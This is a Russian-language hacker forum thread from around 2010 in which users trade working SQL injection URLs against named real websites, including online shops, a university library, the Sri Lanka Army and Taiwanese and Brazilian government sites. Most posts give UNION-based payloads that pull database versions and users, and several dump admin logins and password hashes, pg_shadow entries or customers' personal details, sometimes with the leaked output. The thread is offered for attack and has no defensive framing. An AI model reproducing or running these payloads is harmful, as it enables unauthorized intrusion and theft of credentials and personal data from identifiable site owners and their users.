SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    skills.library.leeds.ac.uk
    PR 6
    Code:
    http://skills.library.leeds.ac.uk/transcript.php?ID=-17+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5--
    shoppingtoursshanghai.com
    PR 4
    Code:
    http://shoppingtoursshanghai.com/page.php?id=-14+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
     
  2. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    http://www.dealbert.net/deal.php?id=2865143)+union+select+1,2,version(),4,5,6,7,8,9,10,11--+

    шоп ноуты

    версия 5.0.77
     
    1 person likes this.
  3. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    http://www.kharkov.net/internet.php3?categ=2+union+select+1,2,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,4,5,6,7,8--

    P.S. Вывод внизу в 17 строчке...

    PR 3 ТиЦ 60 Alexa 1,191,694
     
  4. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    http://www.kingdomready.org/humor.php?id=-36+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7--
     
  5. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    Сайт китайского квартала LA
    chinatownla.com PR-5

    Code:
    http://www.chinatownla.com/news.php?newsId=46-999.9+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5+--+
    Code:
    5.0.77:[email protected]:4470_chinatownlacom
    Сайт Армии Шри Ланки
    www.army.lk

    Code:
    http://www.army.lk/detailed.php?NewsId=495-999.9+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8+--+
    Code:
    5.0.77:sla_db@localhost:sla
     
  6. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    шоп
    Code:
    http://www.allanhouser.com/eventsDetail.php?id=9-999.9+union+select+1,2,3,4,group_concat(0x0b,table_name),6,7,8,9,10,11+from+information_schema.tables--
     
  7. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Пара скулей

    http://www.prof-nastill.ru/result.php?dealer=1&city_id=1+union+select+concat(user(),0x3a,database(),0x3a,version())--

    ruprom@localhost:ruprom_ruprom:5.0.91-community

    ТиЦ 10 PR 1

    http://www.center-prestige.ru/catalogue/preview/?section=-1+union+select+concat(user(),0x3a,database(),0x3a,version())--

    newcenterpr1@localhost:db_newcenterpr1:5.0.67-community

    ТиЦ 120
     
    #13347 z0mbyak, 10 Nov 2010
    Last edited: 11 Nov 2010
  8. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Code:
    http://mosbeer.com.ua/index.php?page=-8+union+select+1,2,3,4,concat_Ws%280x3a,login,pass%29,6,7,8,9,10+from+admin--+
    P.S. /admin
     
    1 person likes this.
  9. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Code:
    http://l2.gtuner.lv/?page=stats&serv=3+union+select+1,2,concat_ws(0x2f,login,password),4,5,6,7,8,9,10,11,12,13,14+from+web_register_tempusers+limit+1,1--
    Version : 5.1.49-log
    Database : web335db5
    User : web335u5@localhost
     
  10. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    http://forum.ampirk.ru/misc.php?sub=memberlist&filter=ad&searchuser=1&custom=1&qorder=and+1=2+union++select+1,concat%28username,char%2858%29,pass%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+amp_forum_users--

    http://asiaatnite.com/forum/misc.php?sub=memberlist&filter=ad&searchuser=1&custom=1&qorder=and+1=2+union+select+1,concat%28user%28%29,0x3a,version%28%29,0x3a,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

    http://www.ashlyninstruments.com/products.php?prodid=-31+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
     
    #13350 z0mbyak, 11 Nov 2010
    Last edited: 11 Nov 2010
  11. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    http://www.dealbert.net/deal.php?id=2865143)+union+select+1,2,UNHEX(HEX(concat_ws(nickname,0x3a,realname,0x3a,password))),4,5,6,7,8,9,10,11+from+users+--+
     
  12. to.Index

    to.Index Member

    Joined:
    3 Jul 2010
    Messages:
    42
    Likes Received:
    22
    Reputations:
    5
    http://www.jubilee-centre.org/topics.php?topicID=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))

    тИЦ 10
    Google PageRank 5
     
    #13352 to.Index, 11 Nov 2010
    Last edited: 11 Nov 2010
  13. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    tits 70
    «Всё видно!» — Всё о нашем зрении: очки, контактные линзы, оправы, оптика
    HTML:
    http://vsevidno.ru/articles.html?article=-1+union+select+1,2,group_concat(login SEPARATOR 0x3a),group_concat(PASSWORD SEPARATOR 0x3a),5,6,7,8,9+from+vsevidno.kernel_users+--+
    4 юзверя
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.renwu-house.gov.tw/en/style/front001/bexfront.php?sid=316526172';select+cast(usename||chr(58)||passwd as int),null,null,null,null,null,null,null+from+pg_shadow--

    http://www.tianliao-house.gov.tw/style/front001/bexfront.php?sid=316526172';select+cast(usename||chr(58)||passwd as int),null,null,null,null,null,null,null+from+pg_shadow--

    http://www.alepe.pe.gov.br/paginas/?id=3525+and+1=(select+cast(usename||chr(58)||passwd+as+int)+from+pg_shadow+limit+1+offset+1)

    http://gov.boynecity.com/government.phtml?catid=330+and+1=version()::int
     
    _________________________
    3 people like this.
  15. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    http://www.strvisa.com/?pg=5+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,UNHEX(HEX(concat_ws(Login,0x3a,Password))),13,14,15,16,17,18+from+str_admins+--+
     
    1 person likes this.
  16. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Code:
    http://benedict.ru/news/news.php?news_id=1337+union+select+1,2,3,4,5,6,7,8,9,10,11,12,table_name,14,15,16,17,18,19+from+information_schema.tables+where+table_schema=database()+limit+1,1--
    user/version/db :

    benedict_1@localhost/5.1.41/benedict_1

    ###
    heks, сильно уж похоже на копи-паст запроса SqlIHelper 2.7. Становимся все ленивее и ленивее :D.
     
    #13356 DeepBlue7, 13 Nov 2010
    Last edited: 13 Nov 2010
  17. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    http://www.rusbulat.ru/vopros.php?vid=6+and+1=0+UnIon+selECt+1,UNHEX(HEX(concat_ws(login,0x3a,pass))),3,4+from+admin+--+

    http://www.khlebprod.ru/hoz2.php?vid=6+and+1=0+union+select+1,2,UNHEX(HEX(group_concat(table_name))),4,5+from+INFORMATION_SCHEMA.COLUMNS+where+Table_name=0x757365727175657374+--+
     
    #13357 heks, 13 Nov 2010
    Last edited: 13 Nov 2010
  18. ra0cg

    ra0cg Elder - Старейшина

    Joined:
    9 Nov 2008
    Messages:
    809
    Likes Received:
    500
    Reputations:
    200
    Code:
    http://www.homeopath.ru/index.php?action=pages&id=8+UNION+SELECT+1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7--
     
    1 person likes this.
  19. skuller

    skuller New Member

    Joined:
    12 Nov 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    version:5.0.32-Debian_7etch5~bpo31+1-log
    user:p[email protected]
    database:pgw10_fortress
     
  20. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    Интернет магазин "Суши Дома"

    HTML:
    http://sushidoma.net/catalog/ajax_order.php?id=-1+union+select+concat_ws(0x3a,id,last_name,first_name,middle_name,login,password,email,phone,address),2,3+from+users+limit+0,1+--+&number=1
    результат смотрим в корзине.
     
Thread Status:
Not open for further replies.